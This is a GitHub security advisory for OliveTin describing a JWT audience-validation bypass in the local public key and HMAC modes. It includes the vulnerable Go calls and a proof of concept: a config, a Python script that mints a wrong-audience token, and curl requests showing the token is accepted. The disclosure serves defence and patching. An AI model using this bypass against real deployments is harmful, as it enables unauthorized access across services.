GHSA-g962-2j28-3cg9

Suggest an improvement
Source
https://github.com/advisories/GHSA-g962-2j28-3cg9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-g962-2j28-3cg9/GHSA-g962-2j28-3cg9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-g962-2j28-3cg9
Aliases
Published
2026-03-05T20:52:12Z
Modified
2026-03-23T04:56:28Z
Severity
  • 8.8 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
OliveTin has JWT Audience Validation Bypass in Local Key and HMAC Modes
Details

Summary

When JWT authentication is configured using either:

  • authJwtPubKeyPath (local RSA public key), or
  • authJwtHmacSecret (HMAC secret),

the configured audience value (authJwtAud) is not enforced during token parsing. As a result, validly signed JWT tokens with an incorrect aud claim are accepted for authentication. This allows authentication using tokens intended for a different audience/service.

Details

Affected Code

File: jwt.go Lines: 51–59, 144–157, 161–168

Current Behavior

Remote JWKS Mode (Correct):

return jwt.Parse(jwtToken, jwksVerifier.Keyfunc, jwt.WithAudience(cfg.AuthJwtAud))

Audience validation is enforced.

Local Public Key Mode (Vulnerable):

return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })

No jwt.WithAudience() option is provided.

HMAC Mode (Vulnerable):

return jwt.Parse(jwtString, func(token *jwt.Token) (interface{}, error) { ... })

No jwt.WithAudience() option is provided.

Why This Is Vulnerable: authJwtAud is ignored for authJwtPubKeyPath and authJwtHmacSecret modes, so wrong-audience tokens are accepted.

PoC

  1. Configure OliveTin

    Use a minimal config with JWT local key authentication:

    authJwtPubKeyPath: ./public.pem
    authJwtHeader: Authorization
    authJwtClaimUsername: sub
    authJwtAud: expected-audience
    
    authRequireGuestsToLogin: true
    
  2. Generate a Wrong-Audience Token

    python3 - <<EOF
    import jwt, datetime
    
    with open("private.pem") as f:
        key = f.read()
    
    token = jwt.encode(
        {
            "sub": "low",
            "aud": "wrong-audience",   # intentionally wrong
            "exp": datetime.datetime.utcnow() + datetime.timedelta(minutes=30)
        },
        key,
        algorithm="RS256"
    )
    
    print(token)
    EOF
    

    This prints the $WRONG_AUD_TOKEN.

  3. Test Without Token (Baseline)

    curl -i -X POST http://localhost:1337/api/WhoAmI \
      -H 'Content-Type: application/json' \
      -d '{}'
    

    Expected response:

    HTTP/1.1 401 Unauthorized
    
  4. Test With Wrong-Audience Token

    curl -i -X POST http://localhost:1337/api/WhoAmI \
      -H 'Content-Type: application/json' \
      -H "Authorization: Bearer $WRONG_AUD_TOKEN" \
      -d '{}'
    

    Expected response:

    HTTP/1.1 200 OK
    {"authenticatedUser":"low","provider":"jwt","usergroup":"","acls":[],"sid":""}
    

    Authentication succeeds even though the aud claim is incorrect.

Impact

An attacker who possesses a valid JWT signed by the configured key (or HMAC secret) but intended for a different audience can authenticate successfully.

This enables:

  • Cross-service token reuse
  • Authentication using tokens issued for other systems
  • Trust boundary violation in multi-service environments

This is particularly severe when:

  • OliveTin is deployed behind a centralized SSO provider
  • The same signing key is reused across services
  • Audience restrictions are relied upon for service isolation

This does not bypass ACL authorization. It is strictly an authentication validation flaw.

Database specific
{
    "cwe_ids":  [
        "CWE-287",
        "CWE-345"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-03-05T20:52:12Z",
    "nvd_published_at":  "2026-03-06T21:16:16Z",
    "severity":  "HIGH"
}
References

Affected packages

Go / github.com/OliveTin/OliveTin

Package

Name
github.com/OliveTin/OliveTin
View open source insights on deps.dev
Purl
pkg:golang/github.com/OliveTin/OliveTin

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.0.0-20260304231339-e97d8ecbd8d6

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-g962-2j28-3cg9/GHSA-g962-2j28-3cg9.json"